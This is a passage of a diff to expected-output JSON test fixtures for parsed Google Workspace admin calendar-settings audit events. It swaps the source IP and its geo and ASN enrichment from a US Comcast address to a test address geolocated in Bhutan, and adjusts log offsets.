@@ -8,7 +8,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "event.provider": "admin", "event.type": [ "creation" 
@@ -24,23 +24,19 @@ "log.offset": 0, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -61,7 +57,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "deletion" 
@@ -74,26 +70,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 414, + "log.offset": 413, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -114,7 +106,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -130,26 +122,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 828, + "log.offset": 826, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -170,7 +158,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "event.provider": "admin", "event.type": [ "creation" 
@@ -183,26 +171,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 1361, + "log.offset": 1358, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -223,7 +207,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "deletion" 
@@ -236,26 +220,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 1784, + "log.offset": 1780, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -276,7 +256,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "event.provider": "admin", "event.type": [ "creation" 
@@ -289,26 +269,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 2207, + "log.offset": 2202, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -329,7 +305,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "deletion" 
@@ -342,26 +318,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 2638, + "log.offset": 2632, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -383,7 +355,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -399,26 +371,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 3069, + "log.offset": 3062, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -439,7 +407,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RENAME_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RENAME_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -453,26 +421,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 3619, + "log.offset": 3611, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -493,7 +457,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -509,26 +473,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 4077, + "log.offset": 4068, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -550,7 +510,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CHANGE_CALENDAR_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CHANGE_CALENDAR_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -569,26 +529,22 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 4619, + "log.offset": 4609, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -609,7 +565,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CANCEL_CALENDAR_EVENTS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CANCEL_CALENDAR_EVENTS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -621,27 +577,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 5208, + "log.offset": 5197, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + 